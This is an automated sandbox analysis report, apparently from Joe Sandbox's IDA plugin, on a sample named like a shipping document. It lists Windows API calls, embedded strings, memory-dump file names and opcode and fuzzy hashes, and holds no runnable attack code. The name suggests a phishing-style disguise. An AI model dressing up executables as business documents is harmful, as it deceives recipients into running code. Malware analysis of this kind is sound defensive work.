                                                                                                                              • Opcode Fuzzy Hash: 577e851e4a4a9e5e231f1e0ab462f645c80661517241fdd432dbc29d19c9edf6
                                                                                                                              • Instruction Fuzzy Hash: 82B15E71A0024AEFDB15DFA8DD45BED7BB4FB48321F108529FA19A72A0DB74D842CB50
                                                                                                                              APIs
                                                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00A0A885
                                                                                                                              • __swprintf.LIBCMT ref: 00A0A926
                                                                                                                              • _wcscmp.LIBCMT ref: 00A0A939
                                                                                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00A0A98E
                                                                                                                              • _wcscmp.LIBCMT ref: 00A0A9CA
                                                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00A0AA01
                                                                                                                              • GetDlgCtrlID.USER32 ref: 00A0AA53
                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00A0AA89
                                                                                                                              • GetParent.USER32(?), ref: 00A0AAA7
                                                                                                                              • ScreenToClient.USER32(00000000), ref: 00A0AAAE
                                                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00A0AB28
                                                                                                                              • _wcscmp.LIBCMT ref: 00A0AB3C
                                                                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 00A0AB62
                                                                                                                              • _wcscmp.LIBCMT ref: 00A0AB76
                                                                                                                                • Part of subcall function 009D37AC: _iswctype.LIBCMT ref: 009D37B4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                                                              • String ID: %s%u
                                                                                                                              • API String ID: 3744389584-679674701
                                                                                                                              • Opcode ID: ef2edfcc4c2716e7478fd7313df223b5e5fbc7eb11629dd75f2ce1929026b6ea
                                                                                                                              • Instruction ID: 75b8b3b396659291ec2ee294bf7924bebdec5e8fc395523a5a58862bf8253a38
                                                                                                                              • Opcode Fuzzy Hash: ef2edfcc4c2716e7478fd7313df223b5e5fbc7eb11629dd75f2ce1929026b6ea
                                                                                                                              • Instruction Fuzzy Hash: DAA1DC7220470AAFD714DF64D884FAAB7E9FF64354F008629F999821D0DB30ED46CB92
                                                                                                                              APIs
                                                                                                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 00A0B1DA
                                                                                                                              • _wcscmp.LIBCMT ref: 00A0B1EB
                                                                                                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 00A0B213
                                                                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 00A0B230
                                                                                                                              • _wcscmp.LIBCMT ref: 00A0B24E
                                                                                                                              • _wcsstr.LIBCMT ref: 00A0B25F
                                                                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00A0B297
                                                                                                                              • _wcscmp.LIBCMT ref: 00A0B2A7
                                                                                                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 00A0B2CE
                                                                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00A0B317
                                                                                                                              • _wcscmp.LIBCMT ref: 00A0B327
                                                                                                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 00A0B34F
                                                                                                                              • GetWindowRect.USER32(00000004,?), ref: 00A0B3B8
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                              • String ID: @$ThumbnailClass
                                                                                                                              • API String ID: 1788623398-1539354611
                                                                                                                              • Opcode ID: 4de607883bb84c384c3f2b22b8f3cb26f6a11b41d9b79a740c129217ff24f296
                                                                                                                              • Instruction ID: 195bd1b6b51967032d2b4ed9d87784daa631e912d322e2dae6ac867918d55b40
                                                                                                                              • Opcode Fuzzy Hash: 4de607883bb84c384c3f2b22b8f3cb26f6a11b41d9b79a740c129217ff24f296
                                                                                                                              • Instruction Fuzzy Hash: FD81917101830A9FDB00DF14DA85FAA7BE8EF84714F14856AFD859A0E2DB30DD46CB62
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __wcsnicmp
                                                                                                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                              • API String ID: 1038674560-1810252412
                                                                                                                              • Opcode ID: 60159c6e4dc069aacf24b2523477e180bb03fbf5ea0f396d92908fbf1c0b3b5e
                                                                                                                              • Instruction ID: f3eb26fde18f8f56f4b5a6ffcef5197858abae203a6a702d90399d94daa74a11
                                                                                                                              • Opcode Fuzzy Hash: 60159c6e4dc069aacf24b2523477e180bb03fbf5ea0f396d92908fbf1c0b3b5e
                                                                                                                              • Instruction Fuzzy Hash: 13318F31A68209B6DA24EAA0DE53FEF7774AF60764F600915F451720D2EF616F04C661
                                                                                                                              APIs
                                                                                                                              • LoadIconW.USER32 ref: 00A0C2D3
                                                                                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00A0C2E5
                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00A0C2FC
                                                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00A0C311
                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00A0C317
                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00A0C327
                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00A0C32D
                                                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00A0C34E
                                                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00A0C368
                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00A0C371
                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00A0C3DC
                                                                                                                              • GetDesktopWindow.USER32 ref: 00A0C3E2
                                                                                                                              • GetWindowRect.USER32(00000000), ref: 00A0C3E9
                                                                                                                              • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00A0C435
                                                                                                                              • GetClientRect.USER32(?,?), ref: 00A0C442
                                                                                                                              • PostMessageW.USER32 ref: 00A0C467
                                                                                                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00A0C492
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3869813825-0
                                                                                                                              • Opcode ID: a6040f55a71e38e60c88ea41741b8cfc0275c20838fc45a62dea8c99b1d693fb
                                                                                                                              • Instruction ID: 5342c2b4c62d4b5e28bfba54bfdd751aa090304f71f429fbdf17fde617e214f0
                                                                                                                              • Opcode Fuzzy Hash: a6040f55a71e38e60c88ea41741b8cfc0275c20838fc45a62dea8c99b1d693fb
                                                                                                                              • Instruction Fuzzy Hash: C1517E30900709EFDB20DFE8EE8AB6EBBB5FF04714F004628F646A65A0D775A905CB50
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Cursor$Load$Info
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2577412497-0
                                                                                                                              • Opcode ID: ad3ba1c7949f5d4dccf5d9049ab9f4ba0210b9ad18ada9cc33cdfec63f11d8ef
                                                                                                                              • Instruction ID: 957bbb3b51f6461cab428312a3bc651da4bb5c1c54b61f7891a4a02385f7d282
                                                                                                                              • Opcode Fuzzy Hash: ad3ba1c7949f5d4dccf5d9049ab9f4ba0210b9ad18ada9cc33cdfec63f11d8ef
                                                                                                                              • Instruction Fuzzy Hash: 793107B0D58319AADB109FFA9C899AFBEF8FF04750F50453AE50DE7280DA7865018F91
                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 00A3A28B
                                                                                                                              • DestroyWindow.USER32 ref: 00A3A305
                                                                                                                                • Part of subcall function 009B7D2C: _memmove.LIBCMT ref: 009B7D66
                                                                                                                              • CreateWindowExW.USER32 ref: 00A3A37F
                                                                                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00A3A3A1
                                                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A3A3B4
                                                                                                                              • DestroyWindow.USER32 ref: 00A3A3D6
                                                                                                                              • CreateWindowExW.USER32 ref: 00A3A40D
                                                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A3A426
                                                                                                                              • GetDesktopWindow.USER32 ref: 00A3A43F
                                                                                                                              • GetWindowRect.USER32(00000000), ref: 00A3A446
                                                                                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00A3A45E
                                                                                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00A3A476
                                                                                                                                • Part of subcall function 009B25DB: GetWindowLongW.USER32(?,000000EB), ref: 009B25EC
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                              • String ID: 0$tooltips_class32
                                                                                                                              • API String ID: 1297703922-3619404913
                                                                                                                              • Opcode ID: 242b05923294d50cfb1c707b423f0f2108c3f6b1abecf124a2d358b8b746fe3d
                                                                                                                              • Instruction ID: 872bf04891fa4f64da4ab9b81e3f46b51616a523eba476a5dda784dadb8bb308
                                                                                                                              • Opcode Fuzzy Hash: 242b05923294d50cfb1c707b423f0f2108c3f6b1abecf124a2d358b8b746fe3d
                                                                                                                              • Instruction Fuzzy Hash: F2717971550244AFDB20CF68DC49FA67BE5EB98700F04462DF9D68B2A0D7B1E942DF22
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009B2612: GetWindowLongW.USER32(?,000000EB), ref: 009B2623
                                                                                                                              • DragQueryPoint.SHELL32(?,?), ref: 00A3C691
                                                                                                                                • Part of subcall function 00A3AB69: ClientToScreen.USER32(?,?), ref: 00A3AB92
                                                                                                                                • Part of subcall function 00A3AB69: GetWindowRect.USER32(?,?), ref: 00A3AC08
                                                                                                                                • Part of subcall function 00A3AB69: PtInRect.USER32(?,?,00A3C07E), ref: 00A3AC18
                                                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00A3C6FA
                                                                                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00A3C705
                                                                                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00A3C728
                                                                                                                              • _wcscat.LIBCMT ref: 00A3C758
                                                                                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00A3C76F
                                                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00A3C788
                                                                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00A3C79F
                                                                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00A3C7C1
                                                                                                                              • DragFinish.SHELL32(?), ref: 00A3C7C8
                                                                                                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00A3C8BB
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                              • API String ID: 169749273-3440237614
                                                                                                                              • Opcode ID: 8f9a0057f5c49d80f5b76e1ec32c5f3392e0723d336e11ee53e9b8b9273864d0
                                                                                                                              • Instruction ID: 3a451b90eb07a230fff6d4adca0653d9848e171c63b50ef37e6cceb04cc4549a
                                                                                                                              • Opcode Fuzzy Hash: 8f9a0057f5c49d80f5b76e1ec32c5f3392e0723d336e11ee53e9b8b9273864d0
                                                                                                                              • Instruction Fuzzy Hash: 2C614B71508300AFC701EFA4DD85E9BBBF8EFC9720F00492EF595961A1DB709A49CB92
                                                                                                                              APIs
                                                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00A3448D
                                                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A344D8
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: BuffCharMessageSendUpper
                                                                                                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                              • API String ID: 3974292440-4258414348
                                                                                                                              • Opcode ID: e2018c1d63b8c3f7fd807a94d7bcb1bad527a71dbc7bc03986a2dd04c06ad293
                                                                                                                              • Instruction ID: 2b758e4567ac6d6476152fe605ed1f5d6e7ac88ab400aadc6ca409d1022b4d2b
                                                                                                                              • Opcode Fuzzy Hash: e2018c1d63b8c3f7fd807a94d7bcb1bad527a71dbc7bc03986a2dd04c06ad293
                                                                                                                              • Instruction Fuzzy Hash: 789181302147019FCB14EF24C591BAAB7A5AFD9354F04886DF8965B3A2CB30FD4ACB81
                                                                                                                              APIs
                                                                                                                              • LoadImageW.USER32 ref: 00A3B8E8
                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00A391F4), ref: 00A3B944
                                                                                                                              • LoadImageW.USER32 ref: 00A3B97D
                                                                                                                              • LoadImageW.USER32 ref: 00A3B9C0
                                                                                                                              • LoadImageW.USER32 ref: 00A3B9F7
                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 00A3BA03
                                                                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00A3BA13
                                                                                                                              • DestroyIcon.USER32(?,?,?,?,?,00A391F4), ref: 00A3BA22
                                                                                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00A3BA3F
                                                                                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00A3BA4B
                                                                                                                                • Part of subcall function 009D307D: __wcsicmp_l.LIBCMT ref: 009D3106
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                                              • String ID: .dll$.exe$.icl
                                                                                                                              • API String ID: 1212759294-1154884017
                                                                                                                              • Opcode ID: e978b07a203e2dbfdc59b4df0cb666a2c4213b15d919d22e4d960e67e11ca15b
                                                                                                                              • Instruction ID: 10e4fe61544f17a88080a2b1670ffce479b256a3d36a2a151a78a0f988643f07
                                                                                                                              • Opcode Fuzzy Hash: e978b07a203e2dbfdc59b4df0cb666a2c4213b15d919d22e4d960e67e11ca15b
                                                                                                                              • Instruction Fuzzy Hash: CE61EF71A60608BEEB14DF64CC42FBE77ADFB08720F108116FA15D61D0DB74AA81CBA0
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009B9997: __itow.LIBCMT ref: 009B99C2
                                                                                                                                • Part of subcall function 009B9997: __swprintf.LIBCMT ref: 009B9A0C
                                                                                                                              • CharLowerBuffW.USER32(?,?), ref: 00A1A455
                                                                                                                              • GetDriveTypeW.KERNEL32 ref: 00A1A4A2
                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A1A4EA
                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A1A521
                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A1A54F
                                                                                                                                • Part of subcall function 009B7D2C: _memmove.LIBCMT ref: 009B7D66
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                              • API String ID: 2698844021-4113822522
                                                                                                                              • Opcode ID: 87d01eff0e3f972a2564278d27c35b8575c1aa97859e1b8ad209d39d185782ce
                                                                                                                              • Instruction ID: 57ececee14b509c5895a365d205766e4d804a8041f61a5ac91d87257f8f56961
                                                                                                                              • Opcode Fuzzy Hash: 87d01eff0e3f972a2564278d27c35b8575c1aa97859e1b8ad209d39d185782ce
                                                                                                                              • Instruction Fuzzy Hash: D5514C711183049FC700EF60C991AAAB7F9FFD4768F404A5DF895572A1DB31AE05CB52
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,009EE382,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00A0FC10
                                                                                                                              • LoadStringW.USER32(00000000,?,009EE382,00000001), ref: 00A0FC19
                                                                                                                                • Part of subcall function 009B7F41: _memmove.LIBCMT ref: 009B7F82
                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00A75310,?,00000FFF,?,?,009EE382,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00A0FC3B
                                                                                                                              • LoadStringW.USER32(00000000,?,009EE382,00000001), ref: 00A0FC3E
                                                                                                                              • __swprintf.LIBCMT ref: 00A0FC8E
                                                                                                                              • __swprintf.LIBCMT ref: 00A0FC9F
                                                                                                                              • _wprintf.LIBCMT ref: 00A0FD48
                                                                                                                              • MessageBoxW.USER32 ref: 00A0FD5F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                              • API String ID: 984253442-2268648507
                                                                                                                              • Opcode ID: 380f89cab70f68d22433919d57beca1d7f484932234e83de20e738c4cd1ce55e
                                                                                                                              • Instruction ID: 3c35605b4a6c756a8b444f9d2ce5877c2f03f7c0c3b13e0873c67802de4c8da9
                                                                                                                              • Opcode Fuzzy Hash: 380f89cab70f68d22433919d57beca1d7f484932234e83de20e738c4cd1ce55e
                                                                                                                              • Instruction Fuzzy Hash: C5413C7280420DABCB15FBE0DE87EEEB778AF94710F500265F505720A2DA346F49CBA1
                                                                                                                              APIs
                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00A3BA8A
                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00A39239,?,?,00000000,?), ref: 00A3BAA1
                                                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00A39239,?,?,00000000,?), ref: 00A3BAAC
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A3BAB9
                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00A3BAC2
                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00A3BAD1
                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00A3BADA
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A3BAE1
                                                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00A3BAF2
                                                                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,00A42CAC,?), ref: 00A3BB0B
                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00A3BB1B
                                                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00A3BB3F
                                                                                                                              • CopyImage.USER32 ref: 00A3BB6A
                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00A3BB92
                                                                                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00A3BBA8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
